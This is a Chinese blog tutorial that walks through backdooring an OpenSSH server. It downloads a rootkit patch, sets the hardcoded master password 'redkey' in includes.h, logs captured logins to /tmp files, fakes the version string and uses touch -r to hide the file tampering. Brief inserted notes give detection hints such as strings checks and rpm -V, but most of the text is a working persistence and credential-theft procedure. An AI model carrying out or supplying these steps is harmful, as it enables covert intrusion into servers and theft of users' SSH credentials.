http://redkey.blog.51cto.com/335290/1345091
一.查看SSH版本
[root@redkey vmshare]
# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
二.下载SSH 源码包
源码包:
http:
//openbsd
.org.ar
/pub/OpenBSD/OpenSSH/portable/openssh-5
.9p1.
tar
.gz
后门文件:
http:
//core
.ipsecs.com
/rootkit/patch-to-hack/0x06-openssh-5
.9p1.patch.
tar
.gz
三.备份原有ssh配置文件
[root@redkey ~]
# cp -p /etc/ssh/sshd_config{,.bak}
四.编译安装
[root@redkey vmshare]
# tar -xzvf openssh-5.9p1.tar.gz
[root@redkey vmshare]
# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
[root@redkey vmshare]
# cd openssh-5.9p1.patch/
[root@redkey openssh-5.9p1.patch]
# cp sshbd5.9p1.diff ../openssh-5.9p1
[root@redkey openssh-5.9p1.patch]
# cd ../openssh-5.9p1
[root@redkey openssh-5.9p1]
# patch < sshbd5.9p1.diff
patching file auth.c
patching file auth-pam.c
patching file auth-passwd.c
patching file canohost.c
patching file includes.h
patching file log.c
patching file servconf.c
patching file sshconnect2.c
patching file sshlogin.c
patching file version.h
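设置后门密码"redkey"(该口令以及下面的 /tmp/ilog、/tmp/olog 均以字符串常量写入 includes.h,通常会以明文留在编译出的 sshd 二进制中;排查时可用 strings 检查 sshd 是否含有这些字符串,并查看 /tmp 下是否存在这两个文件)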
[root@redkey openssh-5.9p1]
# vim includes.h
175 int secret_ok;
176 FILE *f;
177
#define ILOG "/tmp/ilog"
178
#define OLOG "/tmp/olog"
179
#define SECRETPW "redkey"
180
#endif /* INCLUDES_H */
修改版本信息(SSH_VERSION):
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */
#define SSH_VERSION "OpenSSH_5.3p1"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
编译&安装
[root@redkey openssh-5.9p1]
# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
[root@redkey openssh-5.9p1]
# make
[root@redkey openssh-5.9p1]
# make install
|
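五.还原sshd_config文件时间戳(文件时间戳可以像这样被 touch -r 改写,排查时不应以修改时间判断文件是否被动过;按上文的 --prefix=/usr,make install 覆盖的是软件包安装的文件,应使用 rpm -V openssh-server 等包校验,或与官方软件包的哈希比对来发现替换)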
[root@redkey
ssh
]
# touch -r sshd_config.bak ssh_config
六.重启服务或重新载入配置
[root@redkey
ssh
]
# service sshd reload
七.常见问题
1.需要安装的软件包
openssl openssl-devel pam-devel
2.编译常见的问题
编译过程中可能出现的报错:
configure: error: *** zlib.h missing – please install first or check config.log
#
#yum install zlib-devel
configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) ***
#
#yum install openssl openssl-devel